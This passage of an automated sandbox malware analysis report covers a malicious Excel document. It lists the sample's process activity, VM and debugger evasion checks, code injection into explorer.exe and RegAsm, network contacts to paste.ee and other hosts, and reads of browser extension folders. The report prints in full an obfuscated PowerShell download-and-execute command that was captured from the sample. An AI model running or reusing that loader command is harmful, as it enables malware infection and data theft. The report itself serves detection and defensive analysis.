Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: #20240627_Edlen_A.xls	Stream path 'Workbook' entropy: 7.98995851121 (max. 8.0)
Source: 26330000.0.dr	Stream path 'Workbook' entropy: 7.99021384416 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,

22_2_00083862

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_24-890

Source: C:\Users\user\AppData\Roaming\rugtucw	Memory allocated: 2D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Memory allocated: 23B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Memory allocated: 400000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,

22_2_000816C7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 846	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1515	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2052	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7806	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 624	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3368	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3464	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3580	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656	Thread sleep count: 2052 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656	Thread sleep count: 7806 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3692	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1340	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 4028	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw TID: 4064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3204	Thread sleep count: 31 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3204	Thread sleep time: -31000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3188	Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3188	Thread sleep time: -33000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3328	Thread sleep count: 33 > 30
Source: C:\Windows\explorer.exe TID: 3328	Thread sleep time: -33000s >= -30000s

Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00081D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	18_2_00081D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00083ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	18_2_00083ED9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00082B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	18_2_00082B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,	21_2_0008255C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,	22_2_000815BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,	22_2_000814D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,	22_2_000813FE
Source: C:\Windows\explorer.exe	Code function: 23_2_000E1EB4 FindFirstFileW,	23_2_000E1EB4
Source: C:\Windows\explorer.exe	Code function: 23_2_000E1DB0 FindFirstFileW,	23_2_000E1DB0

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_00086512 GetSystemInfo,

18_2_00086512

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior

Source: explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 0000000E.00000000.466511830.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000E.00000000.466511830.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000E.00000000.466511830.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 0000000E.00000002.607048894.0000000007948000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0K
Source: explorer.exe, 0000000E.00000000.466511830.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 0000000E.00000000.465326275.00000000025E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 0000000E.00000002.607048894.0000000007948000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000v
Source: explorer.exe, 0000000E.00000000.466511830.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: CodeIntegrityInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 22_2_00081E4C CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,

22_2_00081E4C

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,

22_2_000816C7

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_000E9247 RtlDeleteCriticalSection,RtlDeleteCriticalSection,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

18_2_000E9247

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_00081000 GetProcessHeap,RtlAllocateHeap,

18_2_00081000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\rugtucw

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: rugtucw.14.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 77.232.129.190 80	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: paste.ee
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 188.114.96.3 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Domain query: prolinice.ga

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD

Creates a thread in another existing process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread created: C:\Windows\explorer.exe EIP: 3F11960

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 4072 base: 95102D value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3124 base: FF31B794 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 2128 base: 95102D value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3196 base: 95102D value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3208 base: FF31B794 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3192 base: 95102D value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3324 base: FF31B794 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3388 base: 95102D value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3352 base: FF31B794 value: 90	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior

Writes to foreign memory regions

